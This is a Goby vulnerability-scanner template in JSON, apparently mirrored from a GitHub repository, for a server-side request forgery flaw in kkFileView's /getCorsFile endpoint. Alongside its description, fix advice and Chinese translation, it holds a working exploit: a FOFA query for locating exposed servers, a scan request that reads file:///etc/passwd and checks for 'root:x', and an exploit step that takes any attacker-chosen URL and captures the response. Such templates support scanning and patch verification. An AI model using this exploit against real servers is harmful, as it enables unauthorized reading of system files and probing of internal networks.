qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/kkFileView-SSRF-vulnerabili...

144 lines
7.2 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "kkFileView SSRF vulnerability",
"Description": "<p>kkFileView This project is an online preview project solution for files and documents. The paid products in the industry include [Yongzhong office] [office365] [idocv], etc. After obtaining the approval of the company's top management, it will be open sourced under the Apache protocol to feed the community. Special thanks @ The support of Mr. Tang and the contribution of @ Duanmu Xiangxiao. The project uses the popular spring boot to build, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc, docx, Excel, pdf, txt, zip, rar, pictures, etc.</p><p>This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</p><p>When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, SSRF vulnerabilities can be triggered and server intranet information can be detected.</p>",
"Product": "kkFileView",
"Homepage": "https://github.com/kekingcn/kkFileView",
"DisclosureDate": "2020-06-14",
"Author": "桂花松糕",
"FofaQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"",
"GobyQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"",
"Level": "2",
"Impact": "<p>When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, the SSRF vulnerability can be triggered and the server intranet information can be detected (any file that supports the file protocol can be read).<br></p>",
"Recommendation": "<p>1. Update to the latest version.</p><p>2. Set permissions for cross-domain preview files.</p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "ssrf_cmd",
"type": "input",
"value": "file:///etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath=file:///etc/passwd",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root:x",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/getCorsFile?urlPath={{{ssrf_cmd}}}",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)(.*)"
]
}
],
"Tags": [
"Other"
],
"VulType": [
"Other"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "8.6",
"Translation": {
"CN": {
"Name": "kkFileView 服务端请求伪造漏洞",
"Product": "kkFileView",
"Description": "<p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">kkFileView&nbsp; 此项目为文件文档在线预览项目解决方案,对标业内付费产品有【</span><a href=\"http://dcs.yozosoft.com/\">永中office</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】【</span><a href=\"http://www.officeweb365.com/\">office365</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】【</span><a href=\"https://www.idocv.com/\">idocv</a><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">】等在取得公司高层同意后以Apache协议开源出来反哺社区在此特别感谢@唐老大的支持以及@端木详笑的贡献。该项目使用流行的spring boot搭建易上手和部署基本支持主流办公文档的在线预览如doc,docx,Excel,pdf,txt,zip,rar,图片等等。</span></p><p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\">本次漏洞出现于:<span style=\"color: rgb(36, 41, 47); font-size: 14px;\">file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</span></span></p><p><span style=\"color: rgb(36, 41, 47); font-size: 16px;\"><span style=\"color: rgb(36, 41, 47); font-size: 14px;\"><span style=\"color: rgb(36, 41, 47); font-size: 14px;\">当通过跨域预览文件的时候urlPath参数是用户可控的通过修改此参数可触发SSRF漏洞探测服务器内网信息。</span><br></span></span></p>",
"Recommendation": "<p>1、 更新至最新版本。</p><p>2、 跨域预览文件设置权限。</p>",
"Impact": "<p><span style=\"color: rgb(36, 41, 47); font-size: 14px;\">当通过跨域预览文件的时候urlPath参数是用户可控的通过修改此参数可触发SSRF漏洞探测服务器内网信息<span style=\"color: rgb(36, 41, 47); font-size: 14px;\">支持file协议的任意文件读取</span>)。</span><br></p>",
"VulType": [
"其他"
],
"Tags": [
"其他"
]
},
"EN": {
"Name": "kkFileView SSRF vulnerability",
"Product": "kkFileView",
"Description": "<p>kkFileView This project is an online preview project solution for files and documents. The paid products in the industry include [Yongzhong office] [office365] [idocv], etc. After obtaining the approval of the company's top management, it will be open sourced under the Apache protocol to feed the community. Special thanks @ The support of Mr. Tang and the contribution of @ Duanmu Xiangxiao. The project uses the popular spring boot to build, easy to use and deploy, and basically supports online preview of mainstream office documents, such as doc, docx, Excel, pdf, txt, zip, rar, pictures, etc.</p><p>This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java</p><p>When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, SSRF vulnerabilities can be triggered and server intranet information can be detected.</p>",
"Recommendation": "<p>1. Update to the latest version.</p><p>2. Set permissions for cross-domain preview files.</p>",
"Impact": "<p>When previewing files across domains, the urlPath parameter is user-controllable. By modifying this parameter, the SSRF vulnerability can be triggered and the server intranet information can be detected (any file that supports the file protocol can be read).<br></p>",
"VulType": [
"Other"
],
"Tags": [
"Other"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink